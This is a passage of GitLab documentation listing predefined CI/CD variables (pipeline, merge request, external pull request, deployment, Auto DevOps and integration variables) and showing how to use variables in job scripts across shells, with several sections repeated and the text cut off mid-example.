| | `CI_MERGE_REQUEST_SOURCE_BRANCH_PROTECTED` | `true` when the source branch of the merge request is [protected](../../user/project/repository/branches/protected.md). Introduced in GitLab 16.4. | | `CI_MERGE_REQUEST_SOURCE_BRANCH_SHA` | The HEAD SHA of the source branch of the merge request. The variable is empty in merge request pipelines. The SHA is present only in [merged results pipelines](../pipelines/merged_results_pipelines.md). | | `CI_MERGE_REQUEST_SOURCE_PROJECT_ID` | The ID of the source project of the merge request. | | `CI_MERGE_REQUEST_SOURCE_PROJECT_PATH` | The path of the source project of the merge request. | | `CI_MERGE_REQUEST_SOURCE_PROJECT_URL` | The URL of the source project of the merge request. | | `CI_MERGE_REQUEST_SQUASH_ON_MERGE` | `true` when the [squash on merge](../../user/project/merge_requests/squash_and_merge.md) option is set. Introduced in GitLab 16.4. | | `CI_MERGE_REQUEST_TARGET_BRANCH_NAME` | The target branch name of the merge request. | | `CI_MERGE_REQUEST_TARGET_BRANCH_PROTECTED` | `true` when the target branch of the merge request is [protected](../../user/project/repository/branches/protected.md). Introduced in GitLab 15.2. | | `CI_MERGE_REQUEST_TARGET_BRANCH_SHA` | The HEAD SHA of the target branch of the merge request. The variable is empty in merge request pipelines. The SHA is present only in [merged results pipelines](../pipelines/merged_results_pipelines.md). | | `CI_MERGE_REQUEST_TITLE` | The title of the merge request. | | `CI_MERGE_REQUEST_DRAFT` | `true` if the merge request is a draft. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/275981) in GitLab 17.10. | ## Predefined variables for external pull request pipelines These variables are only available when: - The pipelines are [external pull request pipelines](../ci_cd_for_external_repos/_index.md#pipelines-for-external-pull-requests). - The pull request is open. 
| Variable | Description | |-----------------------------------------------|-------------| | `CI_EXTERNAL_PULL_REQUEST_IID` | Pull request ID from GitHub. | | `CI_EXTERNAL_PULL_REQUEST_SOURCE_REPOSITORY` | The source repository name of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_TARGET_REPOSITORY` | The target repository name of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_SOURCE_BRANCH_NAME` | The source branch name of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_SOURCE_BRANCH_SHA` | The HEAD SHA of the source branch of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_TARGET_BRANCH_NAME` | The target branch name of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_TARGET_BRANCH_SHA` | The HEAD SHA of the target branch of the pull request. | ## Deployment variables Integrations that are responsible for deployment configuration can define their own predefined variables that are set in the build environment. These variables are only defined for [deployment jobs](../environments/_index.md). For example, the [Kubernetes integration](../../user/project/clusters/deploy_to_cluster.md#deployment-variables) defines deployment variables that you can use with the integration. The [documentation for each integration](../../user/project/integrations/_index.md) explains if the integration has any deployment variables available. ## Auto DevOps variables When [Auto DevOps](../../topics/autodevops/_index.md) is enabled, some additional [pre-pipeline](#variable-availability) variables are made available: - `AUTO_DEVOPS_EXPLICITLY_ENABLED`: Has a value of `1` to indicate Auto DevOps is enabled. - `STAGING_ENABLED`: See [Auto DevOps deployment strategy](../../topics/autodevops/requirements.md#auto-devops-deployment-strategy). - `INCREMENTAL_ROLLOUT_MODE`: See [Auto DevOps deployment strategy](../../topics/autodevops/requirements.md#auto-devops-deployment-strategy). - `INCREMENTAL_ROLLOUT_ENABLED`: Deprecated. 
## Integration variables Some integrations make variables available in jobs. These variables are available as [job-only predefined variables](#variable-availability): - [Harbor](../../user/project/integrations/harbor.md): - `HARBOR_URL` - `HARBOR_HOST` - `HARBOR_OCI` - `HARBOR_PROJECT` - `HARBOR_USERNAME` - `HARBOR_PASSWORD` - [Apple App Store Connect](../../user/project/integrations/apple_app_store.md): - `APP_STORE_CONNECT_API_KEY_ISSUER_ID` - `APP_STORE_CONNECT_API_KEY_KEY_ID` - `APP_STORE_CONNECT_API_KEY_KEY` - `APP_STORE_CONNECT_API_KEY_IS_KEY_CONTENT_BASE64` - [Google Play](../../user/project/integrations/google_play.md): - `SUPPLY_PACKAGE_NAME` - `SUPPLY_JSON_KEY_DATA` - [Diffblue Cover](../../integration/diffblue_cover.md): - `DIFFBLUE_LICENSE_KEY` - `DIFFBLUE_ACCESS_TOKEN_NAME` - `DIFFBLUE_ACCESS_TOKEN` ## Troubleshooting You can [output the values of all variables available for a job](variables_troubleshooting.md#list-all-variables) with a `script` command.
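To reason about slug-style values (`CI_COMMIT_REF_SLUG`, `CI_JOB_NAME_SLUG`, and the other `*_SLUG` variables) outside a job, the rule documented in the tables above — lowercase, everything except `0-9` and `a-z` replaced with `-`, truncated to 63 bytes, no leading or trailing `-` — can be approximated in shell. This is an illustration of the documented rule, not GitLab's actual implementation:

```shell
#!/bin/sh
# Approximate the *_SLUG transformation: lowercase, replace everything except
# a-z and 0-9 with '-', truncate to 63 bytes, strip leading/trailing '-'.
slugify() {
  printf '%s' "$1" | tr '[:upper:]' '[:lower:]' | sed 's/[^a-z0-9]/-/g' \
    | cut -c1-63 | sed 's/^-*//; s/-*$//'
}

slugify "Feature/My_Branch-123"   # prints: feature-my-branch-123
```

Note that this sketch does not collapse internal runs of `-`, and GitLab may apply the truncation and trimming steps in a different order; use it only as a sanity check, not as a source of truth.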
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Predefined CI/CD variables reference --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Predefined [CI/CD variables](_index.md) are available in every GitLab CI/CD pipeline. Avoid [overriding](_index.md#use-pipeline-variables) predefined variables, as it can cause the pipeline to behave unexpectedly. ## Variable availability Predefined variables become available at three different phases of pipeline execution: - Pre-pipeline: Pre-pipeline variables are available before the pipeline is created. These variables are the only variables that can be used with [`include:rules`](../yaml/_index.md#includerules) to control which configuration files to use when creating the pipeline. - Pipeline: Pipeline variables become available when GitLab is creating the pipeline. Along with pre-pipeline variables, pipeline variables can be used to configure [`rules`](../yaml/_index.md#rules) defined in jobs, to determine which jobs to add to the pipeline. - Job-only: These variables are only made available to each job when a runner picks up the job and runs it, and: - Can be used in job scripts. - Cannot be used with [trigger jobs](../pipelines/downstream_pipelines.md#trigger-a-downstream-pipeline-from-a-job-in-the-gitlab-ciyml-file). - Cannot be used with [`workflow`](../yaml/_index.md#workflow), [`include`](../yaml/_index.md#include) or [`rules`](../yaml/_index.md#rules). ## Predefined variables | Variable | Availability | Description | |-------------------------------------------------|--------------|-------------| | `CHAT_CHANNEL` | Pipeline | The Source chat channel that triggered the [ChatOps](../chatops/_index.md) command. 
In GitLab 17.9 and later, the value includes the `path_prefix` when one is specified. | | `CI_PIPELINE_ID` | Job-only | The instance-level ID of the current pipeline. This ID is unique across all projects on the GitLab instance. | | `CI_PIPELINE_IID` | Pipeline | The project-level IID (internal ID) of the current pipeline. This ID is unique only in the current project. | | `CI_PIPELINE_SOURCE` | Pre-pipeline | How the pipeline was triggered. The value can be one of the [pipeline sources](../jobs/job_rules.md#ci_pipeline_source-predefined-variable). | | `CI_PIPELINE_TRIGGERED` | Pipeline | `true` if the job was [triggered](../triggers/_index.md). | | `CI_PIPELINE_URL` | Job-only | The URL for the pipeline details. | | `CI_PIPELINE_CREATED_AT` | Job-only | The date and time when the pipeline was created, in [ISO 8601](https://www.rfc-editor.org/rfc/rfc3339#appendix-A) format. For example, `2022-01-31T16:47:55Z`. [UTC by default](../../administration/timezone.md). | | `CI_PIPELINE_NAME` | Pre-pipeline | The pipeline name defined in [`workflow:name`](../yaml/_index.md#workflowname). Introduced in GitLab 16.3. | | `CI_PIPELINE_SCHEDULE_DESCRIPTION` | Pre-pipeline | The description of the pipeline schedule. Only available in scheduled pipelines. Introduced in GitLab 17.8. | | `CI_PROJECT_DIR` | Job-only | The full path the repository is cloned to, and where the job runs from. If the GitLab Runner `builds_dir` parameter is set, this variable is set relative to the value of `builds_dir`. For more information, see the [Advanced GitLab Runner configuration](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_PROJECT_ID` | Pre-pipeline | The ID of the current project. This ID is unique across all projects on the GitLab instance. | | `CI_PROJECT_NAME` | Pre-pipeline | The name of the directory for the project. For example if the project URL is `gitlab.example.com/group-name/project-1`, `CI_PROJECT_NAME` is `project-1`. 
| | `CI_PROJECT_NAMESPACE` | Pre-pipeline | The project namespace (username or group name) of the job. | | `CI_PROJECT_NAMESPACE_ID` | Pre-pipeline | The project namespace ID of the job. Introduced in GitLab 15.7. | | `CI_PROJECT_NAMESPACE_SLUG` | Pre-pipeline | `$CI_PROJECT_NAMESPACE` in lowercase with characters that are not `a-z` or `0-9` replaced with - and shortened to 63 bytes. | | `CI_PROJECT_PATH_SLUG` | Pre-pipeline | `$CI_PROJECT_PATH` in lowercase with characters that are not `a-z` or `0-9` replaced with `-` and shortened to 63 bytes. Use in URLs and domain names. | | `CI_PROJECT_PATH` | Pre-pipeline | The project namespace with the project name included. | | `CI_PROJECT_REPOSITORY_LANGUAGES` | Pre-pipeline | A comma-separated, lowercase list of the languages used in the repository. For example `ruby,javascript,html,css`. The maximum number of languages is limited to 5. An issue [proposes to increase the limit](https://gitlab.com/gitlab-org/gitlab/-/issues/368925). | | `CI_PROJECT_ROOT_NAMESPACE` | Pre-pipeline | The root project namespace (username or group name) of the job. For example, if `CI_PROJECT_NAMESPACE` is `root-group/child-group/grandchild-group`, `CI_PROJECT_ROOT_NAMESPACE` is `root-group`. | | `CI_PROJECT_TITLE` | Pre-pipeline | The human-readable project name as displayed in the GitLab web interface. | | `CI_PROJECT_DESCRIPTION` | Pre-pipeline | The project description as displayed in the GitLab web interface. Introduced in GitLab 15.1. | | `CI_PROJECT_TOPICS` | Pre-pipeline | A comma-separated, lowercase list of [topics](../../user/project/project_topics.md) (limited to the first 20) assigned to the project. Introduced in GitLab 18.3 | | `CI_PROJECT_URL` | Pre-pipeline | The HTTP(S) address of the project. | | `CI_PROJECT_VISIBILITY` | Pre-pipeline | The project visibility. Can be `internal`, `private`, or `public`. 
| | `CI_PROJECT_CLASSIFICATION_LABEL` | Pre-pipeline | The project [external authorization classification label](../../administration/settings/external_authorization.md). | | `CI_REGISTRY` | Pre-pipeline | Address of the [container registry](../../user/packages/container_registry/_index.md) server, formatted as `<host>[:<port>]`. For example: `registry.gitlab.example.com`. Only available if the container registry is enabled for the GitLab instance. | | `CI_REGISTRY_IMAGE` | Pre-pipeline | Base address for the container registry to push, pull, or tag project's images, formatted as `<host>[:<port>]/<project_full_path>`. For example: `registry.gitlab.example.com/my_group/my_project`. Image names must follow the [container registry naming convention](../../user/packages/container_registry/_index.md#naming-convention-for-your-container-images). Only available if the container registry is enabled for the project. | | `CI_REGISTRY_PASSWORD` | Job-only | The password to push containers to the GitLab project's container registry. Only available if the container registry is enabled for the project. This password value is the same as the `CI_JOB_TOKEN` and is valid only as long as the job is running. Use the `CI_DEPLOY_PASSWORD` for long-lived access to the registry | | `CI_REGISTRY_USER` | Job-only | The username to push containers to the project's GitLab container registry. Only available if the container registry is enabled for the project. | | `CI_RELEASE_DESCRIPTION` | Pipeline | The description of the release. Available only on pipelines for tags. Description length is limited to first 1024 characters. Introduced in GitLab 15.5. | | `CI_REPOSITORY_URL` | Job-only | The full path to Git clone (HTTP) the repository with a [CI/CD job token](../jobs/ci_job_token.md), in the format `https://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.example.com/my-group/my-project.git`. | | `CI_RUNNER_DESCRIPTION` | Job-only | The description of the runner. 
| | `CI_RUNNER_EXECUTABLE_ARCH` | Job-only | The OS/architecture of the GitLab Runner executable. Might not be the same as the environment of the executor. | | `CI_RUNNER_ID` | Job-only | The unique ID of the runner being used. | | `CI_RUNNER_REVISION` | Job-only | The revision of the runner running the job. | | `CI_RUNNER_SHORT_TOKEN` | Job-only | The runner's unique ID, used to authenticate new job requests. The token contains a prefix, and the first 17 characters are used. | | `CI_RUNNER_TAGS` | Job-only | A JSON array of runner tags. For example `["tag_1", "tag_2"]`. | | `CI_RUNNER_VERSION` | Job-only | The version of the GitLab Runner running the job. | | `CI_SERVER_FQDN` | Pre-pipeline | The fully qualified domain name (FQDN) of the instance. For example `gitlab.example.com:8080`. Introduced in GitLab 16.10. | | `CI_SERVER_HOST` | Pre-pipeline | The host of the GitLab instance URL, without protocol or port. For example `gitlab.example.com`. | | `CI_SERVER_NAME` | Pre-pipeline | The name of CI/CD server that coordinates jobs. | | `CI_SERVER_PORT` | Pre-pipeline | The port of the GitLab instance URL, without host or protocol. For example `8080`. | | `CI_SERVER_PROTOCOL` | Pre-pipeline | The protocol of the GitLab instance URL, without host or port. For example `https`. | | `CI_SERVER_SHELL_SSH_HOST` | Pre-pipeline | The SSH host of the GitLab instance, used for access to Git repositories through SSH. For example `gitlab.com`. Introduced in GitLab 15.11. | | `CI_SERVER_SHELL_SSH_PORT` | Pre-pipeline | The SSH port of the GitLab instance, used for access to Git repositories through SSH. For example `22`. Introduced in GitLab 15.11. | | `CI_SERVER_REVISION` | Pre-pipeline | GitLab revision that schedules jobs. | | `CI_SERVER_TLS_CA_FILE` | Pipeline | File containing the TLS CA certificate to verify the GitLab server when `tls-ca-file` set in [runner settings](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). 
| | `CI_SERVER_TLS_CERT_FILE` | Pipeline | File containing the TLS certificate to verify the GitLab server when `tls-cert-file` set in [runner settings](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_SERVER_TLS_KEY_FILE` | Pipeline | File containing the TLS key to verify the GitLab server when `tls-key-file` set in [runner settings](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_SERVER_URL` | Pre-pipeline | The base URL of the GitLab instance, including protocol and port. For example `https://gitlab.example.com:8080`. | | `CI_SERVER_VERSION_MAJOR` | Pre-pipeline | The major version of the GitLab instance. For example, if the GitLab version is `17.2.1`, the `CI_SERVER_VERSION_MAJOR` is `17`. | | `CI_SERVER_VERSION_MINOR` | Pre-pipeline | The minor version of the GitLab instance. For example, if the GitLab version is `17.2.1`, the `CI_SERVER_VERSION_MINOR` is `2`. | | `CI_SERVER_VERSION_PATCH` | Pre-pipeline | The patch version of the GitLab instance. For example, if the GitLab version is `17.2.1`, the `CI_SERVER_VERSION_PATCH` is `1`. | | `CI_SERVER_VERSION` | Pre-pipeline | The full version of the GitLab instance. | | `CI_SERVER` | Job-only | Available for all jobs executed in CI/CD. `yes` when available. | | `CI_SHARED_ENVIRONMENT` | Pipeline | Only available if the job is executed in a shared environment (something that is persisted across CI/CD invocations, like the `shell` or `ssh` executor). `true` when available. | | `CI_TEMPLATE_REGISTRY_HOST` | Pre-pipeline | The host of the registry used by CI/CD templates. Defaults to `registry.gitlab.com`. Introduced in GitLab 15.3. | | `CI_TRIGGER_SHORT_TOKEN` | Job-only | First 4 characters of the [trigger token](../triggers/_index.md#create-a-pipeline-trigger-token) of the current job. Only available if the pipeline was [triggered with a trigger token](../triggers/_index.md). 
For example, for a trigger token of `glptt-1234567890abcdefghij`, `CI_TRIGGER_SHORT_TOKEN` would be `1234`. Introduced in GitLab 17.0. <!-- gitleaks:allow --> | | `GITLAB_CI` | Pre-pipeline | Available for all jobs executed in CI/CD. `true` when available. | | `GITLAB_FEATURES` | Pre-pipeline | The comma-separated list of licensed features available for the GitLab instance and license. | | `GITLAB_USER_EMAIL` | Pipeline | The email of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the email of the user who started the job. | | `GITLAB_USER_ID` | Pipeline | The numeric ID of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the ID of the user who started the job. | | `GITLAB_USER_LOGIN` | Pipeline | The unique username of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the username of the user who started the job. | | `GITLAB_USER_NAME` | Pipeline | The display name (user-defined **Full name** in the profile settings) of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the name of the user who started the job. | | `KUBECONFIG` | Pipeline | The path to the `kubeconfig` file with contexts for every shared agent connection. Only available when a [GitLab agent for Kubernetes is authorized to access the project](../../user/clusters/agent/ci_cd_workflow.md#authorize-agent-access). | | `TRIGGER_PAYLOAD` | Pipeline | The webhook payload. Only available when a pipeline is [triggered with a webhook](../triggers/_index.md#access-webhook-payload). | ## Predefined variables for merge request pipelines These variables are available before GitLab creates the pipeline (Pre-pipeline). These variables can be used with [`include:rules`](../yaml/includes.md#use-rules-with-include) and as environment variables in jobs. 
The pipeline must be a [merge request pipeline](../pipelines/merge_request_pipelines.md), and the merge request must be open.

| Variable | Description |
|---------------------------------------------|-------------|
| `CI_MERGE_REQUEST_APPROVED` | Approval status of the merge request. `true` when [merge request approvals](../../user/project/merge_requests/approvals/_index.md) is available and the merge request has been approved. |
| `CI_MERGE_REQUEST_ASSIGNEES` | Comma-separated list of usernames of assignees for the merge request. Only available if the merge request has at least one assignee. |
| `CI_MERGE_REQUEST_DIFF_BASE_SHA` | The base SHA of the merge request diff. |
| `CI_MERGE_REQUEST_DIFF_ID` | The version of the merge request diff. |
| `CI_MERGE_REQUEST_EVENT_TYPE` | The event type of the merge request. Can be `detached`, `merged_result`, or `merge_train`. |
| `CI_MERGE_REQUEST_DESCRIPTION` | The description of the merge request. If the description is more than 2700 characters long, only the first 2700 characters are stored in the variable. Introduced in GitLab 16.7. |
| `CI_MERGE_REQUEST_DESCRIPTION_IS_TRUNCATED` | `true` if `CI_MERGE_REQUEST_DESCRIPTION` is truncated down to 2700 characters because the description of the merge request is too long, otherwise `false`. Introduced in GitLab 16.8. |
| `CI_MERGE_REQUEST_ID` | The instance-level ID of the merge request. The ID is unique across all projects on the GitLab instance. |
| `CI_MERGE_REQUEST_IID` | The project-level IID (internal ID) of the merge request. This ID is unique for the current project, and is the number used in the merge request URL, page title, and other visible locations. |
| `CI_MERGE_REQUEST_LABELS` | Comma-separated label names of the merge request. Only available if the merge request has at least one label. |
| `CI_MERGE_REQUEST_MILESTONE` | The milestone title of the merge request. Only available if the merge request has a milestone set. |
| `CI_MERGE_REQUEST_PROJECT_ID` | The ID of the project of the merge request. |
| `CI_MERGE_REQUEST_PROJECT_PATH` | The path of the project of the merge request. For example `namespace/awesome-project`. |
| `CI_MERGE_REQUEST_PROJECT_URL` | The URL of the project of the merge request. For example, `http://192.168.10.15:3000/namespace/awesome-project`. |
| `CI_MERGE_REQUEST_REF_PATH` | The ref path of the merge request. For example, `refs/merge-requests/1/head`. |
| `CI_MERGE_REQUEST_SOURCE_BRANCH_NAME` | The source branch name of the merge request. |
| `CI_MERGE_REQUEST_SOURCE_BRANCH_PROTECTED` | `true` when the source branch of the merge request is [protected](../../user/project/repository/branches/protected.md). Introduced in GitLab 16.4. |
| `CI_MERGE_REQUEST_SOURCE_BRANCH_SHA` | The HEAD SHA of the source branch of the merge request. The variable is empty in merge request pipelines. The SHA is present only in [merged results pipelines](../pipelines/merged_results_pipelines.md). |
| `CI_MERGE_REQUEST_SOURCE_PROJECT_ID` | The ID of the source project of the merge request. |
| `CI_MERGE_REQUEST_SOURCE_PROJECT_PATH` | The path of the source project of the merge request. |
| `CI_MERGE_REQUEST_SOURCE_PROJECT_URL` | The URL of the source project of the merge request. |
| `CI_MERGE_REQUEST_SQUASH_ON_MERGE` | `true` when the [squash on merge](../../user/project/merge_requests/squash_and_merge.md) option is set. Introduced in GitLab 16.4. |
| `CI_MERGE_REQUEST_TARGET_BRANCH_NAME` | The target branch name of the merge request. |
| `CI_MERGE_REQUEST_TARGET_BRANCH_PROTECTED` | `true` when the target branch of the merge request is [protected](../../user/project/repository/branches/protected.md). Introduced in GitLab 15.2. |
| `CI_MERGE_REQUEST_TARGET_BRANCH_SHA` | The HEAD SHA of the target branch of the merge request. The variable is empty in merge request pipelines. The SHA is present only in [merged results pipelines](../pipelines/merged_results_pipelines.md). |
| `CI_MERGE_REQUEST_TITLE` | The title of the merge request. |
| `CI_MERGE_REQUEST_DRAFT` | `true` if the merge request is a draft. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/275981) in GitLab 17.10. |

## Predefined variables for external pull request pipelines

These variables are only available when:

- The pipelines are [external pull requests pipelines](../ci_cd_for_external_repos/_index.md#pipelines-for-external-pull-requests).
- The pull request is open.

| Variable | Description |
|-----------------------------------------------|-------------|
| `CI_EXTERNAL_PULL_REQUEST_IID` | Pull request ID from GitHub. |
| `CI_EXTERNAL_PULL_REQUEST_SOURCE_REPOSITORY` | The source repository name of the pull request. |
| `CI_EXTERNAL_PULL_REQUEST_TARGET_REPOSITORY` | The target repository name of the pull request. |
| `CI_EXTERNAL_PULL_REQUEST_SOURCE_BRANCH_NAME` | The source branch name of the pull request. |
| `CI_EXTERNAL_PULL_REQUEST_SOURCE_BRANCH_SHA` | The HEAD SHA of the source branch of the pull request. |
| `CI_EXTERNAL_PULL_REQUEST_TARGET_BRANCH_NAME` | The target branch name of the pull request. |
| `CI_EXTERNAL_PULL_REQUEST_TARGET_BRANCH_SHA` | The HEAD SHA of the target branch of the pull request. |

## Deployment variables

Integrations that are responsible for deployment configuration can define their own predefined variables that are set in the build environment. These variables are only defined for [deployment jobs](../environments/_index.md).

For example, the [Kubernetes integration](../../user/project/clusters/deploy_to_cluster.md#deployment-variables) defines deployment variables that you can use with the integration.

The [documentation for each integration](../../user/project/integrations/_index.md) explains if the integration has any deployment variables available.
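As a minimal sketch (the environment name and `echo` command are illustrative, not taken from a specific integration), a job becomes a deployment job, and therefore receives any integration-defined deployment variables, when it sets `environment`:

```yaml
deploy-job:
  stage: deploy
  environment:
    name: production
  script:
    # Deployment variables defined by an enabled integration are injected
    # into this job's environment, alongside standard environment variables
    # such as CI_ENVIRONMENT_NAME.
    - echo "Deploying to $CI_ENVIRONMENT_NAME"
```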
## Auto DevOps variables

When [Auto DevOps](../../topics/autodevops/_index.md) is enabled, some additional [pre-pipeline](#variable-availability) variables are made available:

- `AUTO_DEVOPS_EXPLICITLY_ENABLED`: Has a value of `1` to indicate Auto DevOps is enabled.
- `STAGING_ENABLED`: See [Auto DevOps deployment strategy](../../topics/autodevops/requirements.md#auto-devops-deployment-strategy).
- `INCREMENTAL_ROLLOUT_MODE`: See [Auto DevOps deployment strategy](../../topics/autodevops/requirements.md#auto-devops-deployment-strategy).
- `INCREMENTAL_ROLLOUT_ENABLED`: Deprecated.

## Integration variables

Some integrations make variables available in jobs. These variables are available as [job-only predefined variables](#variable-availability):

- [Harbor](../../user/project/integrations/harbor.md):
  - `HARBOR_URL`
  - `HARBOR_HOST`
  - `HARBOR_OCI`
  - `HARBOR_PROJECT`
  - `HARBOR_USERNAME`
  - `HARBOR_PASSWORD`
- [Apple App Store Connect](../../user/project/integrations/apple_app_store.md):
  - `APP_STORE_CONNECT_API_KEY_ISSUER_ID`
  - `APP_STORE_CONNECT_API_KEY_KEY_ID`
  - `APP_STORE_CONNECT_API_KEY_KEY`
  - `APP_STORE_CONNECT_API_KEY_IS_KEY_CONTENT_BASE64`
- [Google Play](../../user/project/integrations/google_play.md):
  - `SUPPLY_PACKAGE_NAME`
  - `SUPPLY_JSON_KEY_DATA`
- [Diffblue Cover](../../integration/diffblue_cover.md):
  - `DIFFBLUE_LICENSE_KEY`
  - `DIFFBLUE_ACCESS_TOKEN_NAME`
  - `DIFFBLUE_ACCESS_TOKEN`

## Troubleshooting

You can [output the values of all variables available for a job](variables_troubleshooting.md#list-all-variables) with a `script` command.
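As a quick sketch of that technique, a `script` step can dump the job's environment and filter for the variables of interest. Run outside a pipeline, one variable is pre-set here so the command has something to find:

```shell
# Simulate one predefined variable being present in the shell environment.
export CI_JOB_ID="12345"

# In a job script, this prints every CI_* variable the job actually received.
env | sort | grep '^CI_'
```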
# Use CI/CD variables in job scripts
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

All CI/CD variables are set as environment variables in the job's environment. You can use variables in job scripts with the standard formatting for each environment's shell.

To access environment variables, use the syntax for your [runner executor's shell](https://docs.gitlab.com/runner/executors/).

## With Bash, `sh` and similar

To access environment variables in Bash, `sh`, and similar shells, prefix the CI/CD variable with a dollar sign (`$`):

```yaml
job_name:
  script:
    - echo "$CI_JOB_ID"
```

## With PowerShell

To access variables in a Windows PowerShell environment, including environment variables set by the system, prefix the variable name with `$env:` or `$`:

```yaml
job_name:
  script:
    - echo $env:CI_JOB_ID
    - echo $CI_JOB_ID
    - echo $env:PATH
```

In [some cases](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4115#note_157692820) environment variables must be surrounded by quotes to expand properly:

```yaml
job_name:
  script:
    - D:\\qislsf\\apache-ant-1.10.5\\bin\\ant.bat "-DsosposDailyUsr=$env:SOSPOS_DAILY_USR" portal_test
```

## With Windows Batch

To access CI/CD variables in Windows Batch, surround the variable with `%`:

```yaml
job_name:
  script:
    - echo %CI_JOB_ID%
```

You can also surround the variable with `!` for [delayed expansion](https://ss64.com/nt/delayedexpansion.html). Delayed expansion might be needed for variables that contain white spaces or newlines:

```yaml
job_name:
  script:
    - echo !ERROR_MESSAGE!
```

## In service containers

[Service containers](../docker/using_docker_images.md) can use CI/CD variables, but by default can only access [variables saved in the `.gitlab-ci.yml` file](_index.md#define-a-cicd-variable-in-the-gitlab-ciyml-file).

Variables [added in the GitLab UI](_index.md#define-a-cicd-variable-in-the-ui) are not available to service containers, because service containers are not trusted by default.
To make a UI-defined variable available in a service container, you can re-assign it to another variable in your `.gitlab-ci.yml`:

```yaml
variables:
  SA_PASSWORD_YAML_FILE: $SA_PASSWORD_UI
```

The re-assigned variable cannot have the same name as the original variable. Otherwise it does not get expanded.

## Pass an environment variable to another job

You can create a new environment variable in a job, and pass it to another job in a later stage. These variables cannot be used as CI/CD variables to configure a pipeline (for example with the [`rules` keyword](../yaml/_index.md#rules)), but they can be used in job scripts.

To pass a job-created environment variable to other jobs:

1. In the job script, save the variable as a `.env` file.
   - The format of the file must be one variable definition per line.
   - Each line must be formatted as: `VARIABLE_NAME=ANY VALUE HERE`.
   - Values can be wrapped in quotes, but cannot contain newline characters.
1. Save the `.env` file as an [`artifacts:reports:dotenv`](../yaml/artifacts_reports.md#artifactsreportsdotenv) artifact.
1. Jobs in later stages can then use the variable in scripts, unless [jobs are configured to not receive `dotenv` variables](#control-which-jobs-receive-dotenv-variables).

For example:

```yaml
build-job:
  stage: build
  script:
    - echo "BUILD_VARIABLE=value_from_build_job" >> build.env
  artifacts:
    reports:
      dotenv: build.env

test-job:
  stage: test
  script:
    - echo "$BUILD_VARIABLE"  # Output is: 'value_from_build_job'
```

Variables from `dotenv` reports [take precedence](_index.md#cicd-variable-precedence) over certain types of new variable definitions, such as job-defined variables.

You can also [pass `dotenv` variables to downstream pipelines](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job).
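The `.env` report file is plain text, so its format can be checked in any shell. A sketch of what `build.env` contains after a job like `build-job` above writes to it (the second variable is added only to show multiple lines):

```shell
# Recreate a dotenv report file the way a job script would.
echo "BUILD_VARIABLE=value_from_build_job" > build.env
echo "BUILD_VERSION=v1.0.0" >> build.env

# One VARIABLE_NAME=VALUE definition per line; values cannot contain newlines.
cat build.env
```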
### Control which jobs receive `dotenv` variables

You can use the [`dependencies`](../yaml/_index.md#dependencies) or [`needs`](../yaml/_index.md#needs) keywords to control which jobs receive the `dotenv` artifacts.

To have no environment variables from a `dotenv` artifact:

- Pass an empty `dependencies` or `needs` array.
- Pass [`needs:artifacts`](../yaml/_index.md#needsartifacts) as `false`.
- Set `needs` to only list jobs that do not have a `dotenv` artifact.

For example:

```yaml
build-job1:
  stage: build
  script:
    - echo "BUILD_VERSION=v1.0.0" >> build.env
  artifacts:
    reports:
      dotenv: build.env

build-job2:
  stage: build
  needs: []
  script:
    - echo "This job has no dotenv artifacts"

test-job1:
  stage: test
  script:
    - echo "$BUILD_VERSION"  # Output is: 'v1.0.0'
  dependencies:
    - build-job1

test-job2:
  stage: test
  script:
    - echo "$BUILD_VERSION"  # Output is ''
  dependencies: []

test-job3:
  stage: test
  script:
    - echo "$BUILD_VERSION"  # Output is: 'v1.0.0'
  needs:
    - build-job1

test-job4:
  stage: test
  script:
    - echo "$BUILD_VERSION"  # Output is: 'v1.0.0'
  needs:
    - job: build-job1
      artifacts: true

test-job5:
  stage: deploy
  script:
    - echo "$BUILD_VERSION"  # Output is ''
  needs:
    - job: build-job1
      artifacts: false

test-job6:
  stage: deploy
  script:
    - echo "$BUILD_VERSION"  # Output is ''
  needs:
    - build-job2
```

## Pass an environment variable from the `script` section to `artifacts` or `cache`

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/29391) in GitLab 16.4.

{{< /history >}}

Use `$GITLAB_ENV` to use environment variables defined in the `script` section in the `artifacts` or `cache` keywords.

For example:

```yaml
build-job:
  stage: build
  script:
    - echo "ARCH=$(arch)" >> $GITLAB_ENV
    - touch some-file-$(arch)
  artifacts:
    paths:
      - some-file-$ARCH
```

## Store multiple values in one variable

You cannot create a CI/CD variable that is an array of values, but you can use shell scripting techniques for similar behavior.
For example, you can store multiple values separated by a space in a variable, then loop through the values with a script:

```yaml
job1:
  variables:
    FOLDERS: src test docs
  script:
    - |
      for FOLDER in $FOLDERS
      do
        echo "The path is root/${FOLDER}"
      done
```

## Use CI/CD variables in other variables

You can use variables inside other variables:

```yaml
job:
  variables:
    FLAGS: '-al'
    LS_CMD: 'ls "$FLAGS"'
  script:
    - 'eval "$LS_CMD"'  # Executes 'ls -al'
```

### As part of a string

You can use variables as part of a string. You can surround the variables with curly brackets (`{}`) to help distinguish the variable name from the surrounding text. Without curly brackets, the adjacent text is interpreted as part of the variable name. For example:

```yaml
job:
  variables:
    FLAGS: '-al'
